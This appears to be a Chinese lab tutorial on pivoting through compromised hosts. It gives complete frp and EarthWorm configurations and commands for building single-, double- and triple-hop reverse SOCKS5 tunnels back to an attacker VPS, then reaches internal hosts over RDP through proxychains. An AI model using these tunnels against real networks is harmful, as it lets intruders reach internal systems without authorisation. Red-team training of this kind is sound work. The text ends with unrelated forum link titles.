socks代理工具
环境概括
网络拓扑图如下:
网络信息
攻击者kali
web
172.16.102.35
10.10.3.100
ziyu
hexin
hexiao
0x01 frp
下载地址
https://github.com/fatedier/frp/releases
反向代理
vps配置:
frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
web配置
frpc.ini
[common]
server_addr = 172.16.102.40
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
vps执行
frps.exe -c frps.ini
web执行
frpc.exe -c frpc.ini
成功运行
攻击机kali上配置proxychains4
vim /etc/proxychains4.conf
在注释掉socks4并添加socks5 172.16.102.40 7777
测试连通性
proxychains4 rdesktop 10.10.3.6
二级代理
vps配置
frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
web配置
frpc.ini
[common]
server_addr = 172.16.102.40
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.3.100
local_port = 7777
remote_port = 7777
frps.ini
[common]
bind_addr = 10.10.3.100
bind_port = 7000
ziyu配置
frpc.ini
[common]
server_addr = 10.10.3.100
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
vps执行
frps.exe -c frps.ini
web执行
frpc.exe -c frpc.ini
frps.exe -c frps.ini
ziyu执行
frpc.exe -c frpc.ini
成功运行
测试连通性
kali执行proxychains4 rdesktop 10.10.5.7
三级代理
vps配置
frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
web配置
frpc.ini
[common]
server_addr = 172.16.102.40
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.3.100
local_port = 7777
remote_port = 7777
frps.ini
[common]
bind_addr = 10.10.3.100
bind_port = 7000
ziyu配置
frpc.ini
[common]
server_addr = 10.10.3.100
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.5.6
local_port = 7777
remote_port = 7777
frps.ini
[common]
bind_addr = 10.10.5.6
bind_port = 7000
hexin配置
frpc.ini
[common]
server_addr = 10.10.5.6
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
vps执行
rrps.exe -c frps.ini
web执行
frpc.exe -c frpc.ini
frps.exe -c frps.ini
ziyu执行
frpc.exe -c frpc.ini
hexin执行
frpc.exe -c frpc.ini
成功运行
测试连通性
proxychains4 rdesktop 192.168.72.210
0x02 ew
下载地址
https://github.com/idlefire/ew
Earthworm提供六种链路状态,可通过
-s
参数选定 分别为
ssocksd、rcsocks、rssocks 提供socks代理服务
lcx_listen、lcx_slave、lcx_tran 提供端口转发服务
反向代理
vps执行
ew -s rcsocks -l 1080 -e 1024
vps监听1080和1024端口 等待攻击者机器访问1080端口
目标机器访问1024端口
web执行
ew -s rssocks -d 172.16.102.40 -e 1024
其中-d参数为vps地址
成功运行
在攻击机kali上配置proxychains4
vim /etc/proxychains4.conf
在文末注释点socks4 并添加socks5 172.16.102.40 1080
测试连通性
攻击机kali执行proxychains4 rdesktop 10.10.3.6
二级代理
vps执行
ew -s lcx_listen -l 1080 -e 1024
ziyu执行
ew -s ssocksd -l 9999
web执行
ew -s lcx_slave -d 172.16.102.40 -e 1024 -f 10.10.3.6 -g 9999
成功运行
测试连通性
攻击机kali执行proxychains4 rdesktop 10.10.5.7
三级代理
vps执行
ew -s rssocks -l 1080 -e 1024
web执行
ew -s lcx_slave -d 172.16.102.40 -e 1024 -f 10.10.3.6 -g 9999
ziyu执行
ew -s lcx_listen -l 9999 -e 7777
hexin执行
ew -s rcsocks -d 10.10.5.6 -e 7777
成功运行
测试连通性
攻击机kali执行proxychains4 rdesktop 192.168.72.210
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子技术论坛GHOST WIN10X86 快速装机
电脑疯子GHOST WIN10X64 快速装机版201812
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子 GHOST WIN7 X64 安全增强版20180
电脑疯子技术论坛GHOST WIN10X64 安全增强
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子母盘之:Win7_ultimate_32+64位纯
电脑疯子win7_x64纯净母盘[VIP福利]【旗舰
电脑疯子win7x86纯净母盘[VIP福利]【旗舰版
电脑疯子GHOST XP VIP会员纯净版201901
电脑疯子 GHOST WIN7 X64 快速装机版20201
【全网视频免费看】盒子影视精选+手机影视
电脑疯子母盘之:Windows_10_LTSC_2019【32
电脑疯子 GHOST WINDOWS7 X64 快速装机版20
电脑疯子GHOST WIN10X64 VIP纯净版201901
【2】全网影视VIP视频免费看【投屏观看更爽
电脑疯子母盘之:Windows7_Professional_32
电脑疯子技术论坛GHOST WIN10X64 VIP纯情版
微软常用运行库合集 v2019.07.23(32&64位)
WinRAR 5.71 简体中文零售特别版
